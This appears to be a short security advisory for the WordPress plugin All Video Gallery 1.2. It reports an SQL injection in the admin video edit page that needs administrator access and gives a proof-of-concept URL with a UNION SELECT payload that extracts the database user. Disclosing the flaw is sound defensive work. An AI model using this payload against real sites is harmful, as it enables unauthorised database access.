Wp Plugin All Video Gallery

Plugin Details

Plugin Name: wp-plugin : all-video-gallery
Effected Version : 1.2 (and most probably lower version's if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number :
Identified by : Anantshri
WPScan Reference URL

Disclosure Timeline

Technical Details

<http://localhost/wp-admin/admin.php?page=allvideogallery_videos&opt=edit&id=2 union select 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18>

Although Version 1.2 was released to fix simmilar issues however this perticular instance was not fixed considering to the fact that this interface is only accessible to administrator.